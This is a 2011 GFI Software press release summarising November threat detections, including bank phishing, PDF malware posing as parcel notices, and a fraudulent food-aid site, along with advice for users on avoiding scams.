Cybercriminals Kick Off Holiday Season by Spreading Malware and Phishing Attacks

GFI Labs identified numerous scams last month, including cybercriminals posing as the federal government to exploit food stamp recipients

GFI Software today released its VIPRE Report, a compilation of the 10 most prevalent threat detections for the previous month. Noteworthy threats in November 2011 included a new Facebook worm; the return of PDF-based malware posing as the postal services and parcel firms; Bank of America and SunTrust Bank phishing scams.

“Staying vigilant online – especially during the holiday shopping season – is key to not falling victim to scams or infecting a PC by clicking on malicious links or files,” said Christopher Boyd, senior threat researcher for GFI Software. “When in doubt, users should take a page from Santa’s playbook by ‘checking it twice.’ Never open attachments or provide information in response to unsolicited emails, and always remember that a bank will never ask for sensitive information via email.”

In the days leading up to Thanksgiving in the US, GFI Labs detected an increase in bank related phishing. Users received emails purporting to originate from major retail banks including SunTrust Bank and Bank of America. Both scams were unique in that they contained an HTML attachment which was actually a form asking for banking login information and even driver’s license numbers. Users who doubt the authenticity of an email communication from their bank should call their local branch or the customer services phone number printed on the back of their debit or credit card to verify.

PDF-based malware made a return in November. This type of attack is not new, but the time of year makes this one particularly effective. Users receive emails from what appears to be a legitimate parcel delivery company or postal operator, informing them that they have a package that cannot be delivered due to insufficient address information. The attached PDF appears to be a shipping label which users are instructed to print. Upon opening the file, a variant of FakeSysDef, a rogue malware, is installed.

“Underscoring that anyone can be a target of cybercrime and that it’s not just big enterprises and banks that are at risk, last month we found scammers targeting people with limited financial resources,” said Jovi Umawing, threat researcher for GFI Software. “A fraudulent food aid website was set up to misappropriate the mobile phone numbers of those supported by food donation schemes. Thinking they were responding to an official request from the government, victims provided their phone numbers, which were automatically enrolled in a premium SMS service, placing unauthorised and unwanted charges on their phone bills.”